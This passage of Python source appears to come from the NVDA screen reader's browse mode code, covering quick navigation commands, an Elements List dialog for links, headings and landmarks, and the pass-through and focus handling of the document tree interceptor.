	prevError=_("no previous radio button"))
qn("comboBox", key="c",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next combo box"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next combo box"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous combo box"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous combo box"))
qn("checkBox", key="x",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next check box"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next check box"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous check box"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous check box"))
qn("graphic", key="g",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next graphic"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next graphic"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous graphic"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous graphic"))
qn("blockQuote", key="q",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next block quote"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next block quote"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous block quote"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous block quote"))
qn("notLinkBlock", key="n",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("skips forward past a block of links"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no more text after a block of links"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("skips backward past a block of links"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no more text before a block of links"),
	readUnit=textInfos.UNIT_LINE)
qn("landmark", key="d",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next landmark"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next landmark"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous landmark"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous landmark"),
	readUnit=textInfos.UNIT_LINE)
qn("embeddedObject", key="o",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next embedded object"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next embedded object"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous embedded object"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous embedded object"))
qn("annotation", key="a",
	# Translators: Input help message for a quick navigation command in browse mode.
	nextDoc=_("moves to the next annotation"),
	# Translators: Message presented when the browse mode element is not found.
	nextError=_("no next annotation"),
	# Translators: Input help message for a quick navigation command in browse mode.
	prevDoc=_("moves to the previous annotation"),
	# Translators: Message presented when the browse mode element is not found.
	prevError=_("no previous annotation"))
# The qn helper was only needed while registering the quick navigation commands above.
del qn

class ElementsListDialog(wx.Dialog):
	"""Dialog listing elements of a given type (links, headings, landmarks)
	found in a browse mode document, allowing the user to filter, move to or
	activate one of them.
	"""

	# Pairs of (element type ID passed to the document's _iterNodesByType,
	# label for the corresponding radio button).
	ELEMENT_TYPES = (
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("link", _("Lin&ks")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("heading", _("&Headings")),
		# Translators: The label of a radio button to select the type of element
		# in the browse mode Elements List dialog.
		("landmark", _("Lan&dmarks")),
	)

	# item: the browse mode item for this element; parent: the Element this one
	# nests under, or None at the root.
	Element = collections.namedtuple("Element", ("item", "parent"))

	# Index into ELEMENT_TYPES remembered across dialog instances
	# (written back onto the class in onAction).
	lastSelectedElementType=0

	def __init__(self, document):
		self.document = document
		# Translators: The title of the browse mode Elements List dialog.
		super(ElementsListDialog, self).__init__(gui.mainFrame, wx.ID_ANY, _("Elements List"))
		mainSizer = wx.BoxSizer(wx.VERTICAL)

		# Translators: The label of a group of radio buttons to select the type of element
		# in the browse mode Elements List dialog.
		child = wx.RadioBox(self, wx.ID_ANY, label=_("Type:"), choices=tuple(et[1] for et in self.ELEMENT_TYPES))
		child.SetSelection(self.lastSelectedElementType)
		child.Bind(wx.EVT_RADIOBOX, self.onElementTypeChange)
		mainSizer.Add(child,proportion=1)

		# Tree showing the elements of the selected type, preserving document nesting.
		self.tree = wx.TreeCtrl(self, wx.ID_ANY, style=wx.TR_HAS_BUTTONS | wx.TR_HIDE_ROOT | wx.TR_SINGLE | wx.TR_EDIT_LABELS)
		self.tree.Bind(wx.EVT_SET_FOCUS, self.onTreeSetFocus)
		self.tree.Bind(wx.EVT_CHAR, self.onTreeChar)
		self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.onTreeLabelEditBegin)
		self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.onTreeLabelEditEnd)
		# The root is hidden (TR_HIDE_ROOT); all real elements hang off it.
		self.treeRoot = self.tree.AddRoot("root")
		mainSizer.Add(self.tree,proportion=7,flag=wx.EXPAND)

		sizer = wx.BoxSizer(wx.HORIZONTAL)
		# Translators: The label of an editable text field to filter the elements
		# in the browse mode Elements List dialog.
		label = wx.StaticText(self, wx.ID_ANY, _("&Filter by:"))
		sizer.Add(label)
		self.filterEdit = wx.TextCtrl(self, wx.ID_ANY)
		self.filterEdit.Bind(wx.EVT_TEXT, self.onFilterEditTextChange)
		sizer.Add(self.filterEdit)
		mainSizer.Add(sizer,proportion=1)

		sizer = wx.BoxSizer(wx.HORIZONTAL)
		# Translators: The label of a button to activate an element
		# in the browse mode Elements List dialog.
		self.activateButton = wx.Button(self, wx.ID_ANY, _("&Activate"))
		self.activateButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(True))
		sizer.Add(self.activateButton)
		# Translators: The label of a button to move to an element
		# in the browse mode Elements List dialog.
		self.moveButton = wx.Button(self, wx.ID_ANY, _("&Move to"))
		self.moveButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(False))
		sizer.Add(self.moveButton)
		sizer.Add(wx.Button(self, wx.ID_CANCEL))
		mainSizer.Add(sizer,proportion=1)

		mainSizer.Fit(self)
		self.SetSizer(mainSizer)

		self.tree.SetFocus()
		self.initElementType(self.ELEMENT_TYPES[self.lastSelectedElementType][0])
		self.Center(wx.BOTH | wx.CENTER_ON_SCREEN)

	def onElementTypeChange(self, evt):
		"""Rebuild the element list when a different type radio button is chosen."""
		elementType=evt.GetInt()
		# We need to make sure this gets executed after the focus event.
		# Otherwise, NVDA doesn't seem to get the event.
		queueHandler.queueFunction(queueHandler.eventQueue, self.initElementType, self.ELEMENT_TYPES[elementType][0])
		self.lastSelectedElementType=elementType

	def initElementType(self, elType):
		"""Gather all elements of the given type from the document into
		self._elements (as Element tuples recording nesting), and record the
		element nearest the caret in self._initialElement.
		"""
		if elType == "link":
			# Links can be activated.
			self.activateButton.Enable()
			self.SetAffirmativeId(self.activateButton.GetId())
		else:
			# No other element type can be activated.
			self.activateButton.Disable()
			self.SetAffirmativeId(self.moveButton.GetId())

		# Gather the elements of this type.
		self._elements = []
		self._initialElement = None

		# Stack of ancestor Elements of the element currently being processed.
		parentElements = []
		isAfterSelection=False
		for item in self.document._iterNodesByType(elType):
			# Find the parent element, if any.
			for parent in reversed(parentElements):
				if item.isChild(parent.item):
					break
				else:
					# We're not a child of this parent, so this parent has no more children and can be removed from the stack.
					parentElements.pop()
			else:
				# No parent found, so we're at the root.
				# Note that parentElements will be empty at this point, as all parents are no longer relevant and have thus been removed from the stack.
				parent = None

			element=self.Element(item,parent)
			self._elements.append(element)

			if not isAfterSelection:
				isAfterSelection=item.isAfterSelection
				if not isAfterSelection:
					# The element immediately preceding or overlapping the caret should be the initially selected element.
					# Since we have not yet passed the selection, use this as the initial element.
					try:
						self._initialElement = self._elements[-1]
					except IndexError:
						# No previous element.
						pass

			# This could be the parent of a subsequent element, so add it to the parents stack.
			parentElements.append(element)

		# Start with no filtering.
		self.filterEdit.ChangeValue("")
		self.filter("", newElementType=True)

	def filter(self, filterText, newElementType=False):
		"""Repopulate the tree with elements whose label contains filterText
		(case-insensitive), preserving nesting, and select a sensible default item.
		"""
		# If this is a new element type, use the element nearest the cursor.
		# Otherwise, use the currently selected element.
		defaultElement = self._initialElement if newElementType else self.tree.GetItemPyData(self.tree.GetSelection())
		# Clear the tree.
		self.tree.DeleteChildren(self.treeRoot)

		# Populate the tree with elements matching the filter text.
		elementsToTreeItems = {}
		defaultItem = None
		matched = False
		#Do case-insensitive matching by lowering both filterText and each element's text.
		filterText=filterText.lower()
		for element in self._elements:
			if filterText and filterText not in element.item.label.lower():
				continue
			matched = True
			parent = element.parent
			if parent:
				# The parent may have been filtered out, in which case fall back to the root.
				parent = elementsToTreeItems.get(parent)
			item = self.tree.AppendItem(parent or self.treeRoot, element.item.label)
			self.tree.SetItemPyData(item, element)
			elementsToTreeItems[element] = item
			if element == defaultElement:
				defaultItem = item

		self.tree.ExpandAll()

		if not matched:
			# No items, so disable the buttons.
			self.activateButton.Disable()
			self.moveButton.Disable()
			return

		# If there's no default item, use the first item in the tree.
		self.tree.SelectItem(defaultItem or self.tree.GetFirstChild(self.treeRoot)[0])
		# Enable the button(s).
		# If the activate button isn't the default button, it is disabled for this element type and shouldn't be enabled here.
		if self.AffirmativeId == self.activateButton.Id:
			self.activateButton.Enable()
		self.moveButton.Enable()

	def onTreeSetFocus(self, evt):
		# Start with no search.
		self._searchText = ""
		self._searchCallLater = None
		evt.Skip()

	def onTreeChar(self, evt):
		"""Handle keys in the tree: enter activates the default button, F2 renames,
		printable characters perform incremental search.
		"""
		key = evt.KeyCode

		if key == wx.WXK_RETURN:
			# The enter key should be propagated to the dialog and thus activate the default button,
			# but this is broken (wx ticket #3725).
			# Therefore, we must catch the enter key here.
			# Activate the current default button.
			evt = wx.CommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_ANY)
			button = self.FindWindowById(self.AffirmativeId)
			if button.Enabled:
				button.ProcessEvent(evt)
			else:
				wx.Bell()

		elif key == wx.WXK_F2:
			item=self.tree.GetSelection()
			if item:
				selectedItemType=self.tree.GetItemPyData(item).item
				self.tree.EditLabel(item)
				evt.Skip()

		elif key >= wx.WXK_START or key == wx.WXK_BACK:
			# Non-printable character.
			self._searchText = ""
			evt.Skip()

		else:
			# Search the list.
			# We have to implement this ourselves, as tree views don't accept space as a search character.
			char = unichr(evt.UnicodeKey).lower()
			# If the same character is typed twice, do the same search.
			if self._searchText != char:
				self._searchText += char
			if self._searchCallLater:
				self._searchCallLater.Restart()
			else:
				# Clear the accumulated search text after a second of inactivity.
				self._searchCallLater = wx.CallLater(1000, self._clearSearchText)
			self.search(self._searchText)

	def onTreeLabelEditBegin(self,evt):
		# Veto the edit if the underlying item does not support renaming.
		item=self.tree.GetSelection()
		selectedItemType = self.tree.GetItemPyData(item).item
		if not selectedItemType.isRenameAllowed:
			evt.Veto()

	def onTreeLabelEditEnd(self,evt):
		# Commit the new label to the underlying item.
		selectedItemNewName=evt.GetLabel()
		item=self.tree.GetSelection()
		selectedItemType = self.tree.GetItemPyData(item).item
		selectedItemType.rename(selectedItemNewName)

	def _clearSearchText(self):
		self._searchText = ""

	def search(self, searchText):
		"""Select the next tree item whose label starts with searchText."""
		item = self.tree.GetSelection()
		if not item:
			# No items.
			return

		# First try searching from the current item.
		# Failing that, search from the first item.
		items = itertools.chain(self._iterReachableTreeItemsFromItem(item), self._iterReachableTreeItemsFromItem(self.tree.GetFirstChild(self.treeRoot)[0]))
		if len(searchText) == 1:
			# If only a single character has been entered, skip (search after) the current item.
			next(items)

		for item in items:
			if self.tree.GetItemText(item).lower().startswith(searchText):
				self.tree.SelectItem(item)
				return

		# Not found.
		wx.Bell()

	def _iterReachableTreeItemsFromItem(self, item):
		"""Yield item and all items after it that are visible (i.e. not hidden
		inside a collapsed parent), in document order.
		"""
		while item:
			yield item

			childItem = self.tree.GetFirstChild(item)[0]
			if childItem and self.tree.IsExpanded(item):
				# Has children and is reachable, so recurse.
				for childItem in self._iterReachableTreeItemsFromItem(childItem):
					yield childItem

			item = self.tree.GetNextSibling(item)

	def onFilterEditTextChange(self, evt):
		self.filter(self.filterEdit.GetValue())
		evt.Skip()

	def onAction(self, activate):
		"""Close the dialog and either activate or move to the selected element."""
		self.Close()
		# Save off the last selected element type on to the class so it's used in initialization next time.
		self.__class__.lastSelectedElementType=self.lastSelectedElementType
		item = self.tree.GetSelection()
		item = self.tree.GetItemPyData(item).item
		if activate:
			item.activate()
		else:
			def move():
				speech.cancelSpeech()
				item.moveTo()
				item.report()
			# Delay the move slightly so it happens after the dialog has closed.
			wx.CallLater(100, move)

class BrowseModeDocumentTextInfo(textInfos.TextInfo):
	"""TextInfo mix-in for browse mode documents which adds landmark reporting
	to speech and braille control field output.
	"""

	def getControlFieldSpeech(self, attrs, ancestorAttrs, fieldType, formatConfig=None, extraDetail=False, reason=None):
		textList = []
		landmark = attrs.get("landmark")
		if formatConfig["reportLandmarks"] and fieldType == "start_addedToControlFieldStack" and landmark:
			try:
				textList.append(attrs["name"])
			except KeyError:
				pass
			if landmark == "region":
				# The word landmark is superfluous for regions.
				textList.append(aria.landmarkRoles[landmark])
			else:
				# Translators: This is spoken and brailled to indicate a landmark (example output: main landmark).
				textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
		textList.append(super(BrowseModeDocumentTextInfo, self).getControlFieldSpeech(attrs, ancestorAttrs, fieldType, formatConfig, extraDetail, reason))
		return " ".join(textList)

	def getControlFieldBraille(self, field, ancestors, reportStart, formatConfig):
		textList = []
		landmark = field.get("landmark")
		if formatConfig["reportLandmarks"] and reportStart and landmark and field.get("_startOfNode"):
			try:
				textList.append(field["name"])
			except KeyError:
				pass
			if landmark == "region":
				# The word landmark is superfluous for regions.
				textList.append(aria.landmarkRoles[landmark])
			else:
				# Translators: This is spoken and brailled to indicate a landmark (example output: main landmark).
				textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
		text = super(BrowseModeDocumentTextInfo, self).getControlFieldBraille(field, ancestors, reportStart, formatConfig)
		if text:
			textList.append(text)
		return " ".join(textList)

	def _get_focusableNVDAObjectAtStart(self):
		# Walk up from this position to find the nearest focusable object,
		# falling back to the document root.
		try:
			item = next(self.obj._iterNodesByType("focusable", "up", self))
		except StopIteration:
			return self.obj.rootNVDAObject
		if not item:
			return self.obj.rootNVDAObject
		return item.obj

class BrowseModeDocumentTreeInterceptor(cursorManager.CursorManager,BrowseModeTreeInterceptor,treeInterceptorHandler.DocumentTreeInterceptor):

	programmaticScrollMayFireEvent = False

	def __init__(self,obj):
		super(BrowseModeDocumentTreeInterceptor,self).__init__(obj)
		self.disableAutoPassThrough = False
		self._lastProgrammaticScrollTime = None
		self.documentConstantIdentifier = self.documentConstantIdentifier
		self._lastFocusObj = None
		self._hadFirstGainFocus = False
		self._enteringFromOutside = True
		# We need to cache this because it will be unavailable once the document dies.
		if not hasattr(self.rootNVDAObject.appModule, "_browseModeRememberedCaretPositions"):
			self.rootNVDAObject.appModule._browseModeRememberedCaretPositions = {}
		self._lastCaretPosition = None
		#: True if the last caret move was due to a focus change.
		self._lastCaretMoveWasFocus = False

	def terminate(self):
		# Persist the caret position on the app module so it can be restored
		# next time this document is loaded.
		# NOTE(review): shouldRememberCaretPositionAcrossLoads is presumably defined
		# elsewhere on this class or a base class - confirm.
		if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition:
			try:
				self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition
			except AttributeError:
				# The app module died.
				pass

	def event_treeInterceptor_gainFocus(self):
		"""Triggered when this browse mode document gains focus.
		This event is only fired upon entering this treeInterceptor when it was not the current treeInterceptor before.
		This is different to L{event_gainFocus}, which is fired when an object inside this treeInterceptor gains focus, even if that object is in the same treeInterceptor.
		"""
		doSayAll=False
		hadFirstGainFocus=self._hadFirstGainFocus
		if not hadFirstGainFocus:
			# This treeInterceptor is gaining focus for the first time.
			# Fake a focus event on the focus object, as the treeInterceptor may have missed the actual focus event.
			focus = api.getFocusObject()
			self.event_gainFocus(focus, lambda: focus.event_gainFocus())
			if not self.passThrough:
				# We only set the caret position if in browse mode.
				# If in focus mode, the document must have forced the focus somewhere,
				# so we don't want to override it.
				initialPos = self._getInitialCaretPos()
				if initialPos:
					self.selection = self.makeTextInfo(initialPos)
				reportPassThrough(self)
				doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad']
			self._hadFirstGainFocus = True

		if not self.passThrough:
			if doSayAll:
				speech.speakObjectProperties(self.rootNVDAObject,name=True,states=True,reason=controlTypes.REASON_FOCUS)
				sayAllHandler.readText(sayAllHandler.CURSOR_CARET)
			else:
				# Speak it like we would speak focus on any other document object.
				# This includes when entering the treeInterceptor for the first time:
				if not hadFirstGainFocus:
					speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
				else:
					# And when coming in from an outside object
					# #4069 But not when coming up from a non-rendered descendant.
					ancestors=api.getFocusAncestors()
					fdl=api.getFocusDifferenceLevel()
					try:
						tl=ancestors.index(self.rootNVDAObject)
					except ValueError:
						# The root is not an ancestor of the focus.
						tl=len(ancestors)
					if fdl<=tl:
						speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
				info = self.selection
				if not info.isCollapsed:
					speech.speakSelectionMessage(_("selected %s"), info.text)
				else:
					info.expand(textInfos.UNIT_LINE)
					speech.speakTextInfo(info, reason=controlTypes.REASON_CARET, unit=textInfos.UNIT_LINE)
		reportPassThrough(self)
		braille.handler.handleGainFocus(self)

	def event_caret(self, obj, nextHandler):
		# In browse mode the virtual caret is managed by this interceptor,
		# so only propagate caret events while in pass through (focus) mode.
		if self.passThrough:
			nextHandler()

	def _activateNVDAObject(self, obj):
		"""Activate an object in response to a user request.
		This should generally perform the default action or click on the object.
		@param obj: The object to activate.
		@type obj: L{NVDAObjects.NVDAObject}
		"""
		obj.doAction()

	def _activateLongDesc(self,controlField):
		"""
		Activates (presents) the long description for a particular field (usually a graphic).
		@param controlField: the field whose long description should be activated. This field is guaranteed to have states containing HASLONGDESC state.
		@type controlField: dict
		"""
		raise NotImplementedError

	def _activatePosition(self, info=None):
		"""Activate whatever is at the given (or caret) position: interact with
		math, switch to focus mode, focus an embedded object/application, or
		perform the object's default action.
		"""
		if not info:
			info=self.makeTextInfo(textInfos.POSITION_CARET)
		obj = info.NVDAObjectAtStart
		if not obj:
			return
		if obj.role == controlTypes.ROLE_MATH:
			import mathPres
			try:
				return mathPres.interactWithMathMl(obj.mathMl)
			except (NotImplementedError, LookupError):
				pass
			return
		if self.shouldPassThrough(obj):
			obj.setFocus()
			self.passThrough = True
			reportPassThrough(self)
		elif obj.role == controlTypes.ROLE_EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES:
			obj.setFocus()
			speech.speakObject(obj, reason=controlTypes.REASON_FOCUS)
		else:
			self._activateNVDAObject(obj)

	def _set_selection(self, info, reason=controlTypes.REASON_CARET):
		super(BrowseModeDocumentTreeInterceptor, self)._set_selection(info)
		if isScriptWaiting() or not info.isCollapsed:
			return
		# Save the last caret position for use in terminate().
		# This must be done here because the buffer might be cleared just before terminate() is called,
		# causing the last caret position to be lost.
		caret = info.copy()
		caret.collapse()
		self._lastCaretPosition = caret.bookmark
		review.handleCaretMove(caret)
		if reason == controlTypes.REASON_FOCUS:
			self._lastCaretMoveWasFocus = True
			focusObj = api.getFocusObject()
			if focusObj==self.rootNVDAObject:
				return
		else:
			self._lastCaretMoveWasFocus = False
			focusObj=info.focusableNVDAObjectAtStart
			obj=info.NVDAObjectAtStart
			if not obj:
				log.debugWarning("Invalid NVDAObjectAtStart")
				return
			if obj==self.rootNVDAObject:
				return
			# Only move the system focus if no other focus change is already pending.
			if focusObj and not eventHandler.isPendingEvents("gainFocus") and focusObj!=self.rootNVDAObject and focusObj != api.getFocusObject() and self._shouldSetFocusToObj(focusObj):
				focusObj.setFocus()
			obj.scrollIntoView()
			if self.programmaticScrollMayFireEvent:
				self._lastProgrammaticScrollTime = time.time()
		self.passThrough=self.shouldPassThrough(focusObj,reason=reason)
		# Queue the reporting of pass through mode so that it will be spoken after the actual content.
		queueHandler.queueFunction(queueHandler.eventQueue, reportPassThrough, self)

	def _shouldSetFocusToObj(self, obj):
		"""Determine whether an object should receive focus.
		Subclasses may extend or override this method.
		@param obj: The object in question.
		@type obj: L{NVDAObjects.NVDAObject}
		"""
		return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.ROLE_EMBEDDEDOBJECT

	def script_activateLongDesc(self,gesture):
		# Search the control fields at the caret (innermost first) for one with
		# a long description and activate it.
		info=self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand("character")
		for field in reversed(info.getTextWithFields()):
			if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart":
				states=field.field.get('states')
				if states and controlTypes.STATE_HASLONGDESC in states:
					self._activateLongDesc(field.field)
					break
		else:
			# Translators: the message presented when the activateLongDescription script cannot locate a long description to activate.
			ui.message(_("No long description"))
	# Translators: the description for the activateLongDescription script on browseMode documents.
	script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.")

	def shouldPassThrough(self, obj, reason=None):
		"""Determine whether pass through mode should be enabled or disabled for a given object.
		@param obj: The object in question.
		@type obj: L{NVDAObjects.NVDAObject}
		@param reason: The reason for this query; one of the output reasons, L{REASON_QUICKNAV}, or C{None} for manual pass through mode activation by the user.
		@return: C{True} if pass through mode should be enabled, C{False} if it should be disabled.
		"""
		if reason and (
			self.disableAutoPassThrough
			or (reason == controlTypes.REASON_FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"])
			or (reason == controlTypes.REASON_CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"])
		):
			# This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state.
			return self.passThrough
		if reason == REASON_QUICKNAV:
			return False
		states = obj.states
		role = obj.role
		# Editable controls that are available always warrant pass through.
		if controlTypes.STATE_EDITABLE in states and controlTypes.STATE_UNAVAILABLE not in states:
			return True
		# Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable.
		if not obj.isFocusable and controlTypes.STATE_FOCUSED not in states and role != controlTypes.ROLE_POPUPMENU:
			return False
		# many controls that are read-only should not switch to passThrough.
		# However, certain controls such as combo boxes and readonly edits are read-only but still interactive.
		# #5118: read-only ARIA grids should also be allowed (focusable table cells, rows and headers).
		if controlTypes.STATE_READONLY in states and role not in (controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER):
			return False
		if reason == controlTypes.REASON_FOCUS and role in (controlTypes.ROLE_LISTITEM, controlTypes.ROLE_RADIOBUTTON, controlTypes.ROLE_TAB):
			return True
		if role in (controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_LIST, controlTypes.ROLE_SLIDER, controlTypes.ROLE_TABCONTROL, controlTypes.ROLE_MENUBAR, controlTypes.ROLE_POPUPMENU, controlTypes.ROLE_MENUITEM, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM, controlTypes.ROLE_SPINBUTTON, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER, controlTypes.ROLE_CHECKMENUITEM, controlTypes.ROLE_RADIOMENUITEM) or controlTypes.STATE_EDITABLE in states:
			return True
		if reason == controlTypes.REASON_FOCUS:
			# If this is a focus change, pass through should be enabled for certain ancestor containers.
			while obj and obj != self.rootNVDAObject:
				if obj.role == controlTypes.ROLE_TOOLBAR:
					return True
				obj = obj.parent
		return False

	def event_caretMovementFailed(self, obj, nextHandler, gesture=None):
		"""When a caret movement key fails in focus mode, move the browse mode
		caret to the corresponding edge of the field and re-run the gesture's
		browse mode script.
		"""
		if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]:
			return nextHandler()
		if gesture.mainKeyName in ("home", "end"):
			# Home, end, control+home and control+end should not disable pass through.
			return nextHandler()
		script = self.getScript(gesture)
		if not script:
			return nextHandler()
		# We've hit the edge of the focused control.
		# Therefore, move the virtual caret to the same edge of the field.
		info = self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand(info.UNIT_CONTROLFIELD)
		if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"):
			info.collapse()
		else:
			info.collapse(end=True)
			info.move(textInfos.UNIT_CHARACTER, -1)
		info.updateCaret()
		scriptHandler.queueScript(script, gesture)

	def script_disablePassThrough(self, gesture):
		# Only makes sense when pass through was enabled manually.
		if not self.passThrough or self.disableAutoPassThrough:
			return gesture.send()
		self.passThrough = False
		self.disableAutoPassThrough = False
		reportPassThrough(self)
	script_disablePassThrough.ignoreTreeInterceptorPassThrough = True

	def script_collapseOrExpandControl(self, gesture):
		# Expanding a collapsed control (e.g. a combo box) enters focus mode;
		# collapsing it leaves focus mode unless pass through was manual.
		oldFocus = api.getFocusObject()
		oldFocusStates = oldFocus.states
		gesture.send()
		if controlTypes.STATE_COLLAPSED in oldFocusStates:
			self.passThrough = True
		elif not self.disableAutoPassThrough:
			self.passThrough = False
		reportPassThrough(self)
	script_collapseOrExpandControl.ignoreTreeInterceptorPassThrough = True

	def _tabOverride(self, direction):
		"""Override the tab order if the virtual caret is not within the currently focused node.
		This is done because many nodes are not focusable and it is thus possible for the virtual caret to be unsynchronised with the focus.
		In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual caret.
		If the virtual caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation.
		Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned.
		@param direction: The direction in which to move.
		@type direction: str
		@return: C{True} if the tab order was overridden, C{False} if not.
		@rtype: bool
		"""
		if self._lastCaretMoveWasFocus:
			# #5227: If the caret was last moved due to a focus change, don't override tab.
			# This ensures that tabbing behaves as expected after tabbing hits an iframe document.
			return False
		focus = api.getFocusObject()
		try:
			focusInfo = self.makeTextInfo(focus)
		except:
			return False
		# We only want to override the tab order if the caret is not within the focused node.
		caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
		# Only check that the caret is within the focus for things that are not documents
		# As for documents we should always override
		if focus.role!=controlTypes.ROLE_DOCUMENT or controlTypes.STATE_EDITABLE in focus.states:
			# Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges.
			caretInfo.expand(textInfos.UNIT_CHARACTER)
			if focusInfo.isOverlapping(caretInfo):
				return False
		# If we reach here, we do want to override tab/shift+tab if possible.
		# Find the next/previous focusable node.
		try:
			item = next(self._iterNodesByType("focusable", direction, caretInfo))
		except StopIteration:
			return False
		obj=item.obj
		newInfo=item.textInfo
		if obj == api.getFocusObject():
			# This node is already focused, so we need to move to and speak this node here.
			newCaret = newInfo.copy()
			newCaret.collapse()
			self._set_selection(newCaret,reason=controlTypes.REASON_FOCUS)
			if self.passThrough:
				obj.event_gainFocus()
			else:
				speech.speakTextInfo(newInfo,reason=controlTypes.REASON_FOCUS)
		else:
			# This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest.
			obj.setFocus()
		return True

	def script_tab(self, gesture):
		if not self._tabOverride("next"):
			gesture.send()

	def script_shiftTab(self, gesture):
		if not self._tabOverride("previous"):
			gesture.send()

	def event_focusEntered(self,obj,nextHandler):
		if obj==self.rootNVDAObject:
			self._enteringFromOutside = True
		# In browse mode, focusEntered events are swallowed here; they are
		# replayed by _replayFocusEnteredEvents when switching to focus mode.
		if self.passThrough:
			nextHandler()

	def _shouldIgnoreFocus(self, obj):
		"""Determines whether focus on a given object should be ignored.
		@param obj: The object in question.
		@type obj: L{NVDAObjects.NVDAObject}
		@return: C{True} if focus on L{obj} should be ignored, C{False} otherwise.
		@rtype: bool
		"""
		return False

	def _postGainFocus(self, obj):
		"""Executed after a gainFocus within the browseMode document.
		This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler.
		@param obj: The object that gained focus.
		@type obj: L{NVDAObjects.NVDAObject}
		"""

	def _replayFocusEnteredEvents(self):
		# We blocked the focusEntered events because we were in browse mode,
		# but now that we've switched to focus mode, we need to fire them.
		for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]:
			try:
				parent.event_focusEntered()
			except:
				log.exception("Error executing focusEntered event: %s" % parent)

	def event_gainFocus(self, obj, nextHandler):
		enteringFromOutside=self._enteringFromOutside
		self._enteringFromOutside=False
		if not self.isReady:
			if self.passThrough:
				nextHandler()
			return
		if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj:
			# We're entering the document from outside (not returning from an inside object/application; #3145)
			# and this was the last non-root node with focus, so ignore this focus event.
			# Otherwise, if the user switches away and back to this document, the cursor will jump to this node.
			# This is not ideal if the user was positioned over a node which cannot receive focus.
